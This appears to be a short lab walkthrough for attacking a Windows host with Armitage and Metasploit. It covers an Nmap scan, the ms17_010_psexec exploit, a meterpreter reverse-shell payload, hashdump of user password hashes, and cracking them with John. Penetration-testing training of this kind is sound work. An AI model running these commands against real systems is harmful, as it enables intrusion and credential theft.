armitage

Start with: armitage (accept the IP and port)
Next, you will connect to the victim’s system. To do this, click Hosts, select Nmap Scan and then select Quick Scan.

Enter the target IP, press OK and wait for the scan to finish. You will see the target in the upper pane.

Next, you will prepare and launch the PsExec exploit. To do this, click Attacks and select Find Attacks.

Wait for "Happy Hunting" and click OK.

You will now use the PsExec exploit. To do this, type the following commands:

use exploit/windows/smb/ms17_010_psexec
  set RHOST 192.168.0.5
  set LPORT 4444

Now, you need to set the payload. Type the following command:

set payload windows/x64/meterpreter/reverse_tcp
  set SMBUser admin  -> a known user
  set SMBPass Passw0rd  -> and their password
  set VerifyTarget false
run

Right-click the System icon, select Meterpreter 1, select Interact, and then select Meterpreter Shell.

Notice that a new tab with the name Meterpreter 1 is now opened in the bottom pane. Use it:

run post/windows/gather/hashdump

You will see the hashes of all users. Copy all hash lines, including the user:*** part, into a .txt file.

Now try to crack the hashes with John. You need:

Use John:

john --wordlist=/root/Desktop/pass.txt --format=NT /root/Desktop/hashes.txt